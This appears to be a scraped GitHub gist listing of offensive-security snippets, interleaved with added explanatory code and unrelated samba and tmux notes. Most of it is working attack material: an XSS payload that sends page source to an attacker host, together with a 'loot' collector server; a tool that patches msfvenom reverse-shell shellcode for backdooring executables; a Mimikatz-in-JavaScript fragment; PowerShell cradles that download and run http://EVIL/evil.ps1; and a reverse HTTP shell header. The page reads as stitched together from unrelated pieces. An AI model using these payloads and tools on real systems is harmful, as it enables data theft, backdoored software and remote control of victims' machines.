@interference-security
interference-security / send_html_source_using_xss.js
Created June 1, 2018 01:37
JavaScript code to send HTML+JS source of current page using XSS
//Using GET method (a plain cross-origin GET needs no CORS preflight; the victim cannot read the reply, but the data still arrives)
//Use it for URL encoded data delivery
//encodeURIComponent, not encodeURI: encodeURI leaves & = + ? # unescaped, so page content splits the query string or is dropped as a URL fragment
d=encodeURIComponent(document.documentElement.outerHTML)
//Use it for base64 encoded data delivery (btoa throws on characters above U+00FF; very large pages may also hit URL length limits, in which case POST the body instead)
//d=window.btoa(document.documentElement.outerHTML)
x = new XMLHttpRequest();
x.open("GET","//your_site:8000?d="+d,true)
x.send();
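The receiving end of the payload above, as an added example that is not part of the gist: a small collector that listens on port 8000 (the gist's //your_site:8000 placeholder), takes the page from the 'd' query parameter in either delivery mode, and writes it to disk. It also emulates JavaScript's encodeURI(), encodeURIComponent() and btoa() in Python so the effect of each encoding choice can be checked offline; the port, parameter name and file naming are assumptions.

```python
"""Collector for the XSS payload above: receives the exfiltrated page source.

Added example, not part of the gist. Assumptions: it listens on port 8000 (the
gist's //your_site:8000 placeholder), reads the page from the 'd' query
parameter, and is fed by a payload of the shape shown above.
"""
import base64
import binascii
import re
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote, urlsplit

# Characters encodeURI() leaves untouched (URI reserved + unreserved set), and
# the much smaller set encodeURIComponent() leaves untouched.
ENCODEURI_SAFE = ";,/?:@&=+$-_.!~*'()#"
ENCODEURICOMPONENT_SAFE = "-_.!~*'()"
# After form decoding, a raw btoa() payload may contain spaces where '+' was.
B64_RE = re.compile(r"[A-Za-z0-9+/ ]*={0,2}")


def js_encode_uri(s: str) -> str:
    """Emulates JavaScript encodeURI(): UTF-8 percent-encoding that keeps '&',
    '=', '#', '+', '?' and friends, which is exactly why it is unsafe for a
    query-string value."""
    return quote(s, safe=ENCODEURI_SAFE)


def js_encode_uri_component(s: str) -> str:
    """Emulates JavaScript encodeURIComponent()."""
    return quote(s, safe=ENCODEURICOMPONENT_SAFE)


def js_btoa(s: str) -> str:
    """Emulates window.btoa(): one byte per code point, so only U+0000..U+00FF."""
    return base64.b64encode(s.encode("latin-1")).decode("ascii")


def as_browser_would_send(url: str) -> str:
    """Browsers never transmit the fragment, so an unescaped '#' in the page
    silently truncates the data. Returns the query string the server sees."""
    return urlsplit(url).query


def decode_payload(query: str) -> str:
    """Recover the page from the query string. Handles both delivery modes in
    the payload: percent-encoded text, and raw btoa() output (whose '+' the
    form parser has already turned into a space)."""
    params = parse_qs(query, keep_blank_values=True)
    if "d" not in params:
        raise ValueError("no 'd' parameter in request")
    d = params["d"][0]  # parse_qs has percent-decoded and mapped '+' to ' '
    if B64_RE.fullmatch(d):  # HTML always contains '<', so this is unambiguous
        try:
            return base64.b64decode(d.replace(" ", "+"), validate=True).decode("latin-1")
        except (binascii.Error, UnicodeDecodeError):
            pass
    return d


class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        try:
            html = decode_payload(urlsplit(self.path).query)
        except ValueError as exc:
            self.send_error(400, str(exc))
            return
        name = datetime.now(timezone.utc).strftime("loot-%Y%m%dT%H%M%S%fZ.html")
        with open(name, "w", encoding="utf-8") as fh:
            fh.write(html)
        self.log_message("saved %d chars from %s to %s", len(html), self.client_address[0], name)
        self.send_response(204)  # the victim's XHR cannot read the reply cross-origin anyway
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), Collector).serve_forever()
```

Running `decode_payload` over a page encoded with `js_encode_uri` shows the failure mode the comment in the payload warns about: everything after the first `#` never leaves the browser, and the first `&` ends the `d` parameter.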
@interference-security
interference-security / linux-https-proxy.txt
Last active April 17, 2018 09:03
Linux System-level HTTP(S) proxy
Export Burp's CA certificate in DER format as "burp.der" (Proxy > Options > Import / export CA certificate, or browse to http://burp/cert while proxying through Burp)
Convert DER to PEM:
openssl x509 -inform der -in burp.der -out burp.pem
Install Burp certificate in Linux (Debian/Ubuntu): update-ca-certificates only picks up files with a .crt extension under /usr/local/share/ca-certificates, so put the PEM there under that name before running it. Copying burp.pem into /etc/ssl/certs/ by hand is not read by the tool and can be skipped.
cp burp.pem /usr/local/share/ca-certificates/burp.crt
update-ca-certificates
This covers programs that use the system store (curl, wget, git, apt and most OpenSSL/GnuTLS-linked tools). Firefox and Chromium (NSS), Java keystores and Python's certifi bundle keep their own trust stores and need the certificate imported separately.
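The conversion and install steps above, scripted in Python as an added example that is not the gist's own script. It uses the standard library's DER/PEM helpers instead of shelling out to openssl, refuses input that is not an ASN.1 SEQUENCE (the usual sign that the PEM variant was exported and renamed), and prints the SHA-256 fingerprint in the same form as `openssl x509 -fingerprint -sha256` so it can be compared with what Burp shows. The file name burp.der and the /usr/local/share/ca-certificates target are assumptions matching the steps above.

```python
"""Install Burp's exported CA certificate into the Debian/Ubuntu system store.

Added example, not the gist's own script. Assumptions: Burp's CA was exported
in DER format as burp.der, and the target is the /usr/local/share/ca-certificates
directory that update-ca-certificates reads.
"""
import hashlib
import pathlib
import ssl
import subprocess
import sys

CA_DIR = pathlib.Path("/usr/local/share/ca-certificates")


def der_to_pem(der: bytes) -> str:
    """Same conversion as `openssl x509 -inform der -in burp.der -out burp.pem`.
    A DER certificate is an ASN.1 SEQUENCE, so the first byte must be 0x30; this
    catches the common slip of exporting the PEM variant and renaming it .der."""
    if not der or der[0] != 0x30:
        raise ValueError("not a DER certificate (expected ASN.1 SEQUENCE tag 0x30)")
    return ssl.DER_cert_to_PEM_cert(der)


def pem_to_der(pem: str) -> bytes:
    """Inverse of der_to_pem, used to check that the installed file round-trips."""
    return ssl.PEM_cert_to_DER_cert(pem)


def fingerprint_sha256(der: bytes) -> str:
    """SHA-256 over the DER bytes in the colon-separated form that
    `openssl x509 -noout -fingerprint -sha256` prints, so the installed
    certificate can be compared with the one Burp shows."""
    hexdigest = hashlib.sha256(der).hexdigest().upper()
    return ":".join(hexdigest[i:i + 2] for i in range(0, len(hexdigest), 2))


def install_ca(der_path, ca_dir=CA_DIR, refresh: bool = True) -> pathlib.Path:
    """Write the PEM as <ca_dir>/burp.crt and rebuild /etc/ssl/certs.
    update-ca-certificates only picks up files ending in .crt under ca_dir,
    which is why copying burp.pem into /etc/ssl/certs by hand does nothing.
    Needs root for the real directory; refresh=False skips the rebuild."""
    der = pathlib.Path(der_path).read_bytes()
    ca_dir = pathlib.Path(ca_dir)
    ca_dir.mkdir(parents=True, exist_ok=True)
    target = ca_dir / "burp.crt"
    target.write_text(der_to_pem(der))
    if refresh:
        subprocess.run(["update-ca-certificates"], check=True)
    return target


if __name__ == "__main__":
    der_file = sys.argv[1] if len(sys.argv) > 1 else "burp.der"
    print("SHA256 fingerprint:", fingerprint_sha256(pathlib.Path(der_file).read_bytes()))
    print("installed:", install_ca(der_file))
```

Run it as root with the exported file as the argument; compare the printed fingerprint with the CA Burp displays before trusting it.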
apt-get install samba
cd /etc/samba/
Optional:
rm smb.conf
touch smb.conf
nano smb.conf
[Name you want shown for the shared folder]
path = <path of the folder you want to share>
@interference-security
interference-security / msfvenom-reverse-tcp-WaitForSingleObject.md
Created December 10, 2017 11:07 — forked from mgeeky/msfvenom-reverse-tcp-WaitForSingleObject.md
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for the WaitForSingleObject call within a modern msfvenom-generated payload.


Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment and WaitForSingleObject locating and patching. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.

Contents:

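A worked version of the locate-and-patch step the abstract describes, as an added example that is not code from the forked document. It relies on how Metasploit's block_api shellcode calls Windows APIs (push a ROR13 hash of the DLL and function name, then `call ebp`), on the block_api hash for kernel32!WaitForSingleObject (0x601D8708), and on the way block_shell.asm builds INFINITE without a null byte (`dec esi ; push esi ; inc esi`). The classic fix is to turn that `dec esi` into `nop`, so the call waits 0 ms instead of forever; the shellcode bytes in the test are constructed filler around that idiom, not a real msfvenom dump.

```python
"""Locate and neutralise WaitForSingleObject(hProcess, INFINITE) in raw x86
windows/shell_reverse_tcp shellcode.

Added example, not code from the forked document. It relies on Metasploit's
block_api calling convention (push hash, call ebp) and on the hash used for
kernel32!WaitForSingleObject, 0x601D8708. Test input is constructed.
"""
import struct
from typing import Optional

WAIT_HASH = 0x601D8708  # hash("kernel32.dll", "WaitForSingleObject") in block_api
# push 0x601D8708 ; call ebp
CALL_WAIT = b"\x68" + struct.pack("<I", WAIT_HASH) + b"\xff\xd5"
# How block_shell.asm builds the INFINITE argument without a null byte:
#   dec esi (4E) ; push esi (56) ; inc esi (46) ; push dword [eax] (FF 30)
# ESI is 0 on entry, so the push is -1 = INFINITE and ESI is restored to 0.
INFINITE_IDIOM = b"\x4e\x56\x46\xff\x30"
NOP = 0x90


def find_wait_call(shellcode: bytes) -> Optional[int]:
    """Offset of `push 0x601D8708 ; call ebp`, or None if absent.
    None is also what you get for an encoded payload (e.g. shikata_ga_nai),
    because the hash only exists after the decoder stub runs: patch the raw
    payload and encode afterwards."""
    off = shellcode.find(CALL_WAIT)
    return None if off < 0 else off


def find_infinite_push(shellcode: bytes) -> Optional[int]:
    """Offset of the `dec esi` that produces INFINITE right before the call."""
    call = find_wait_call(shellcode)
    if call is None:
        return None
    start = call - len(INFINITE_IDIOM)
    if start < 0 or shellcode[start:call] != INFINITE_IDIOM:
        return None
    return start


def patch_wait_timeout(shellcode: bytes) -> bytes:
    """Turn `dec esi` into `nop`: ESI stays 0, so the call becomes
    WaitForSingleObject(hProcess, 0) and the backdoored program continues
    instead of blocking until the spawned shell exits. The patch is one byte,
    so no later offsets move."""
    idx = find_infinite_push(shellcode)
    if idx is None:
        raise ValueError("INFINITE idiom before WaitForSingleObject not found")
    patched = bytearray(shellcode)
    patched[idx] = NOP
    return bytes(patched)


def changed_offsets(before: bytes, after: bytes) -> list:
    """Offsets that differ, to confirm the patch touched exactly one byte."""
    return [i for i, (x, y) in enumerate(zip(before, after)) if x != y]


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], "rb").read()  # e.g. msfvenom ... -f raw -o shell.bin
    fixed = patch_wait_timeout(raw)
    open(sys.argv[1] + ".patched", "wb").write(fixed)
    print("patched dec esi at offset", find_infinite_push(raw))
```

Generate the payload with `-f raw` and no encoder, patch it, and only then encode or embed it; an encoder run before patching hides the hash bytes and the search returns nothing.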
@interference-security
interference-security / katz.js
Created November 20, 2017 09:04
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
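The defender's view of the cradles listed above, as an added example that is not part of the gist: detection logic that scans PowerShell Script Block Logging text (event ID 4104) for the fetch primitives shown here and scores a fetch that is also fed to IEX higher than a bare download. The log lines are constructed to resemble 4104 ScriptBlockText, the Msxml2 cradle is written out in its usual form since the gist preview cuts off before it, and the rule names and severities are assumptions.

```python
"""Flag PowerShell download cradles of the kinds listed above in logged
script text.

Added example, not part of the gist. The log lines are constructed to look
like the ScriptBlockText of PowerShell Script Block Logging events (ID 4104);
the patterns cover only the cradle shapes shown on this page.
"""
import re

# (rule name, regex). Case-insensitive because PowerShell is.
CRADLE_RULES = [
    ("webclient-downloadstring",
     re.compile(r"new-object\s+(?:system\.)?net\.webclient.*?\.downloadstring\(", re.I | re.S)),
    ("invoke-webrequest",
     re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod)\b\s+['\"]?https?://", re.I)),
    ("hidden-ie-comobject",
     re.compile(r"new-object\s+-com(?:object)?\s+internetexplorer\.application", re.I)),
    ("msxml2-xmlhttp",
     re.compile(r"new-object\s+-com(?:object)?\s+msxml2\.(?:server)?xmlhttp", re.I)),
]
# Something that turns the fetched string into code.
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b|\.invoke\(|\[scriptblock\]::create\(", re.I)


def classify(script_text: str) -> dict:
    """Return which cradle rules fired and whether the text also executes the
    result. A fetch plus IEX is the classic download-and-run pattern; a fetch
    alone may be benign tooling, so it is scored lower."""
    hits = [name for name, rx in CRADLE_RULES if rx.search(script_text)]
    executes = EXEC_RE.search(script_text) is not None
    if hits and executes:
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return {"cradles": hits, "executes": executes, "severity": severity}


def scan(events):
    """events: iterable of (event_id, script_text). Returns findings for 4104
    script blocks only; other event IDs carry different fields."""
    findings = []
    for event_id, text in events:
        if event_id != 4104:
            continue
        verdict = classify(text)
        if verdict["severity"] != "none":
            findings.append((text, verdict))
    return findings


# Constructed sample events, not real telemetry. The first four are the
# cradles listed above (the Msxml2 one written out in its usual form).
SAMPLE_EVENTS = [
    (4104, 'IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")'),
    (4104, "IEX (iwr 'http://EVIL/evil.ps1')"),
    (4104, "$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;"
           "$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r"),
    (4104, "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText"),
    (4104, "(New-Object Net.WebClient).DownloadString('http://intranet/inventory.ps1') | Out-File inv.ps1"),
    (4104, "Get-ChildItem C:\\Users | Measure-Object"),
    (4103, "IEX (iwr 'http://EVIL/evil.ps1')"),  # module-logging event, not a script block
]

if __name__ == "__main__":
    for text, verdict in scan(SAMPLE_EVENTS):
        print(verdict["severity"], verdict["cradles"], text[:60])
```

String splitting (`('I'+'EX')`), backticks and encoded commands defeat literal patterns like these; Script Block Logging records the block as it executes after deobfuscation, which is why it, rather than the command line, is the right source to run this over.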
@interference-security
interference-security / PowerView-2.0-tricks.ps1
Created March 22, 2017 09:47 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to

http://www.mechanicalkeys.com/files/os/notes/tm.html

The formatting here is simple enough to understand (I would hope). ^ means ctrl+, so ^x is ctrl+x. M- means meta (generally left-alt or escape)+, so M-x is left-alt+x

It should be noted that this is nowhere near the full feature set of either tool. This, being a cheat sheet, just points out the most basic features to get you on the road.

Action                        tmux                                        screen
start a new session           tmux  OR  tmux new  OR  tmux new-session    screen
re-attach a detached session  tmux attach  OR  tmux attach-session        screen -r
@interference-security
interference-security / JSRat.ps1
Created January 25, 2016 09:58
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.